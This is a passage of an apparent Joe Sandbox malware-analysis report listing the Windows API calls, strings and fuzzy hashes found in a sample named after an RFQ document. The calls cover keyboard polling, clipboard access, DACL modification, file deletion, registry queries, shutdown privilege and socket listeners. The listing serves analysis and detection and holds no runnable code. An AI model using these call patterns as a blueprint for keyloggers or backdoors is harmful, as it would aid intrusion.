                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0014F478
                                              • FindClose.KERNEL32(00000000), ref: 0014F485
                                              • FindClose.KERNEL32(00000000), ref: 0014F497
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 1824444939-438819550
                                              • Opcode ID: c4929c27d6a6c2abd4b694785daa429441376fbd9a44b06ad2370631c8dcc08e
                                              • Instruction ID: 2c72c99c2366e0fd8428f747c4528f0716de5a6b369252eb63b94d13bbfd12f3
                                              • Opcode Fuzzy Hash: c4929c27d6a6c2abd4b694785daa429441376fbd9a44b06ad2370631c8dcc08e
                                              • Instruction Fuzzy Hash: 7E31C5756012196FDF10AFA4EC98ADE77ACAF49360F14017DE854A32B0DB70DE86CA64
                                              Function 001381F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0013874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00138766
                                                • Part of subcall function 0013874A: GetLastError.KERNEL32(?,0013822A,?,?,?), ref: 00138770
                                                • Part of subcall function 0013874A: GetProcessHeap.KERNEL32(00000008,?,?,0013822A,?,?,?), ref: 0013877F
                                                • Part of subcall function 0013874A: HeapAlloc.KERNEL32(00000000,?,0013822A,?,?,?), ref: 00138786
                                                • Part of subcall function 0013874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013879D
                                                • Part of subcall function 001387E7: GetProcessHeap.KERNEL32(00000008,00138240,00000000,00000000,?,00138240,?), ref: 001387F3
                                                • Part of subcall function 001387E7: HeapAlloc.KERNEL32(00000000,?,00138240,?), ref: 001387FA
                                                • Part of subcall function 001387E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00138240,?), ref: 0013880B
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0013825B
                                              • _memset.LIBCMT ref: 00138270
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0013828F
                                              • GetLengthSid.ADVAPI32(?), ref: 001382A0
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 001382DD
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001382F9
                                              • GetLengthSid.ADVAPI32(?), ref: 00138316
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00138325
                                              • HeapAlloc.KERNEL32(00000000), ref: 0013832C
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0013834D
                                              • CopySid.ADVAPI32(00000000), ref: 00138354
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00138385
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001383AB
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001383BF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              • Opcode ID: 097c7f26e8bc7071ee3b0848f443dae0c82ec0b46d32153b9983ffced2248fdf
                                              • Instruction ID: 0acbac852a7ab50c4801d68412d5d6866776f67ea3d3195764cf39e1dda99332
                                              • Opcode Fuzzy Hash: 097c7f26e8bc7071ee3b0848f443dae0c82ec0b46d32153b9983ffced2248fdf
                                              • Instruction Fuzzy Hash: 96615771A0420AEFDF00DFA5DC85AEEBBB9FF44700F148169F815A7291DB719A46CB60
                                              Function 000F6843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                              • API String ID: 0-4052911093
                                              • Opcode ID: b77938367fd9ef800bb10397cd8b6e4d19eca05a6adfbcf4371204c9688ce1b1
                                              • Instruction ID: 7de8c5ae232d9b53a9892e494c4dabd0e5a8fcf3ad6c37d2c059ddd21f3aebd3
                                              • Opcode Fuzzy Hash: b77938367fd9ef800bb10397cd8b6e4d19eca05a6adfbcf4371204c9688ce1b1
                                              • Instruction Fuzzy Hash: 90726C75E002199BDB24CF58C8807FEB7B5FF48310F15816AE949EB690EB719E81DB90
                                              Function 00160665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 001610A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00160038,?,?), ref: 001610BC
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00160737
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001607D6
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0016086E
                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00160AAD
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00160ABA
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                              • String ID:
                                              • API String ID: 1240663315-0
                                              • Opcode ID: 3b2675c078443351bfef14c2b9c4d6818569147ca811a65c9fc71eaaad85e999
                                              • Instruction ID: b287bb123d3f6a0ee30e042835087ef12747e8862b047e65f3660896714cdb5d
                                              • Opcode Fuzzy Hash: 3b2675c078443351bfef14c2b9c4d6818569147ca811a65c9fc71eaaad85e999
                                              • Instruction Fuzzy Hash: 3EE14C31204210AFCB15DF29CC91E6BBBE5EF89714F04896DF88ADB262DB30E955CB51
                                              Function 00140219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00140241
                                              • GetAsyncKeyState.USER32(000000A0), ref: 001402C2
                                              • GetKeyState.USER32(000000A0), ref: 001402DD
                                              • GetAsyncKeyState.USER32(000000A1), ref: 001402F7
                                              • GetKeyState.USER32(000000A1), ref: 0014030C
                                              • GetAsyncKeyState.USER32(00000011), ref: 00140324
                                              • GetKeyState.USER32(00000011), ref: 00140336
                                              • GetAsyncKeyState.USER32(00000012), ref: 0014034E
                                              • GetKeyState.USER32(00000012), ref: 00140360
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00140378
                                              • GetKeyState.USER32(0000005B), ref: 0014038A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: d5e465569dcb3f228421f7366aebd079908613fcefa9f827b17c5ccec51945d5
                                              • Instruction ID: c898503261c8d4333c05f5d2df5da423c85c57b67e62ddfb2cdeeb154f452c7a
                                              • Opcode Fuzzy Hash: d5e465569dcb3f228421f7366aebd079908613fcefa9f827b17c5ccec51945d5
                                              • Instruction Fuzzy Hash: A44198349047C96EFF329F6698087A5BEA07B19340F08809ED7C6475D2E7F45DC48BA2
                                              Function 00154458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: c7b4de284d04e2ab1c868e1141d6545562d25e058fba0911821b32f19d6e373e
                                              • Instruction ID: 80e31109dfcc82c4f9b676cf90e8f32b72ff405a8405e34cb725806e6d72c18e
                                              • Opcode Fuzzy Hash: c7b4de284d04e2ab1c868e1141d6545562d25e058fba0911821b32f19d6e373e
                                              • Instruction Fuzzy Hash: 5421A135200210EFDB10AF24EC09B6D77A8EF54715F14802AF946DB2B2DBB0AC81CB95
                                              Function 00143A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000E48A1,?,?,000E37C0,?), ref: 000E48CE
                                                • Part of subcall function 00144CD3: GetFileAttributesW.KERNEL32(?,00143947), ref: 00144CD4
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00143ADF
                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00143B87
                                              • MoveFileW.KERNEL32(?,?), ref: 00143B9A
                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00143BB7
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00143BD9
                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00143BF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 4002782344-1173974218
                                              • Opcode ID: 51ca5cfaa488aa225e3c1bde26a15cdf28347f3b7e4f71dfe4e077cdb8055d70
                                              • Instruction ID: 348a250f27943c0fdb46e06e61cf48e5c740ba5e6c5dc9546c1ef77314e62477
                                              • Opcode Fuzzy Hash: 51ca5cfaa488aa225e3c1bde26a15cdf28347f3b7e4f71dfe4e077cdb8055d70
                                              • Instruction Fuzzy Hash: E151B33180518C9ECF05EBA1DE929EDB778AF14300F6841A9E456771A2EF716F0DCBA1
                                              Function 0014F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0014F6AB
                                              • Sleep.KERNEL32(0000000A), ref: 0014F6DB
                                              • _wcscmp.LIBCMT ref: 0014F6EF
                                              • _wcscmp.LIBCMT ref: 0014F70A
                                              • FindNextFileW.KERNEL32(?,?), ref: 0014F7A8
                                              • FindClose.KERNEL32(00000000), ref: 0014F7BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                              • String ID: *.*
                                              • API String ID: 713712311-438819550
                                              • Opcode ID: 3c8aeaaba50c0628c3fcd023fcc01f30cebd53a4096d251bc8eb552d73f08a89
                                              • Instruction ID: 47a0cfb5f5b82f9aed0e55c6b7bac6c141d524cf9c2b26c9f8417d345d14cbe0
                                              • Opcode Fuzzy Hash: 3c8aeaaba50c0628c3fcd023fcc01f30cebd53a4096d251bc8eb552d73f08a89
                                              • Instruction Fuzzy Hash: 8741817190020A9FDF15DF64CC85EEEBBB4FF05311F14456AE819A32A1EB749E85CBA0
                                              Function 000F4140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                              • API String ID: 0-1546025612
                                              • Opcode ID: 6b6f6be8a8c59024b34da95f348d69f2a5205f236c8b9c137ed3c1edd7efeca0
                                              • Instruction ID: 5278fe78aeb232283c2e28d102e14b2daa0a15d9c9b073261006d813e54874de
                                              • Opcode Fuzzy Hash: 6b6f6be8a8c59024b34da95f348d69f2a5205f236c8b9c137ed3c1edd7efeca0
                                              • Instruction Fuzzy Hash: 81A28E70E0422E8BDF24CF58D9907BEB7B1FB54314F2481AADD15A7A80E7709E91EB50
                                              Function 000F58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: ed8c1b4777b6a4875c41f3853aca3d7eafa04a4fb62848365bb9748baeb7d5b5
                                              • Instruction ID: 8a574936b05d1d174b9ead3c5d0221f2f31c2bfb286595ed96665a3127855bad
                                              • Opcode Fuzzy Hash: ed8c1b4777b6a4875c41f3853aca3d7eafa04a4fb62848365bb9748baeb7d5b5
                                              • Instruction Fuzzy Hash: 5712A870A00609EFDF18CFA5D991AEEB3F5FF48300F108569E946A7691EB36AD11CB50
                                              Function 0014545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00138CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00138D0D
                                                • Part of subcall function 00138CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00138D3A
                                                • Part of subcall function 00138CC3: GetLastError.KERNEL32 ref: 00138D47
                                              • ExitWindowsEx.USER32(?,00000000), ref: 0014549B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                              • String ID: $@$SeShutdownPrivilege
                                              • API String ID: 2234035333-194228
                                              • Opcode ID: 9a49801c51ccdfe670f5dbf7e220e4ec7aad07fd0f6af47562787e6fc5764a16
                                              • Instruction ID: 70e797488384a5cf2d6f6f373ac1b32f231904f08cb976e29ca5dc3021c8f81b
                                              • Opcode Fuzzy Hash: 9a49801c51ccdfe670f5dbf7e220e4ec7aad07fd0f6af47562787e6fc5764a16
                                              • Instruction Fuzzy Hash: D301F231655B116BFB2C6778EC4ABBA729AEB05753F290125FC07DA0F3FB905C8581A0
                                              Function 00156596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001565EF
                                              • WSAGetLastError.WSOCK32(00000000), ref: 001565FE
                                              • bind.WSOCK32(00000000,?,00000010), ref: 0015661A
                                              • listen.WSOCK32(00000000,00000005), ref: 00156629
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00156643
                                              • closesocket.WSOCK32(00000000,00000000), ref: 00156657
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                              • String ID:
                                              • API String ID: 1279440585-0
                                              • Opcode ID: 7335cf49e4c6db0b3e057145fad70e6cd80cb9ba17f315828fc0bb622a88039d
                                              • Instruction ID: 2f04c3a292c3c6981fadbd95f9270504f5c224eef8830bd7e6e313e69955a8f7
                                              • Opcode Fuzzy Hash: 7335cf49e4c6db0b3e057145fad70e6cd80cb9ba17f315828fc0bb622a88039d
                                              • Instruction Fuzzy Hash: 6D219E30600200EFCB10AF24DC85B6EB7A9EF44321F148169F966AB3E2CB70AD45CB91
                                              Function 000F5680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00100FF6: std::exception::exception.LIBCMT ref: 0010102C
                                                • Part of subcall function 00100FF6: __CxxThrowException@8.LIBCMT ref: 00101041
                                              • _memmove.LIBCMT ref: 0013062F
                                              • _memmove.LIBCMT ref: 00130744
                                              • _memmove.LIBCMT ref: 001307EB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                              • String ID:
                                              • API String ID: 1300846289-0
                                              • Opcode ID: 776835a7be0396b98a6d737cb7f4b270d30882d6ea6f8161387aa247dc983e94
                                              • Instruction ID: c5b0412ad3554c85c0c2251d6bfca8c7bc35922a0dbf7fb1b031b6ad09d66cca
                                              • Opcode Fuzzy Hash: 776835a7be0396b98a6d737cb7f4b270d30882d6ea6f8161387aa247dc983e94
                                              • Instruction Fuzzy Hash: AD0290B0E00209DFDF05DF64D991ABE7BF5EF48300F1480A9E94AEB295EB319951CB91
                                              Function 000E1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 000E19FA
                                              • GetSysColor.USER32(0000000F), ref: 000E1A4E
                                              • SetBkColor.GDI32(?,00000000), ref: 000E1A61
                                                • Part of subcall function 000E1290: DefDlgProcW.USER32(?,00000020,?), ref: 000E12D8
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ColorProc$LongWindow
                                              • String ID:
                                              • API String ID: 3744519093-0
                                              • Opcode ID: 824183786bbfac2bd388b330a2edea49cb0d9cf9809ba1863c7d7f7daa4b1d86
                                              • Instruction ID: 426d6daacd767dcbbb32b0f1fec41f49aa3d4db4651cbcae83c9a9ce1ca0efd9
                                              • Opcode Fuzzy Hash: 824183786bbfac2bd388b330a2edea49cb0d9cf9809ba1863c7d7f7daa4b1d86
                                              • Instruction Fuzzy Hash: 66A1197120A5C4BED638AB2B9C94EFF359DDB4A381B180139F402F6592CB349D9192B7
                                              Function 00156A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 001580A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001580CB
                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00156AB1
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00156ADA
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00156B13
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00156B20
                                              • closesocket.WSOCK32(00000000,00000000), ref: 00156B34
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
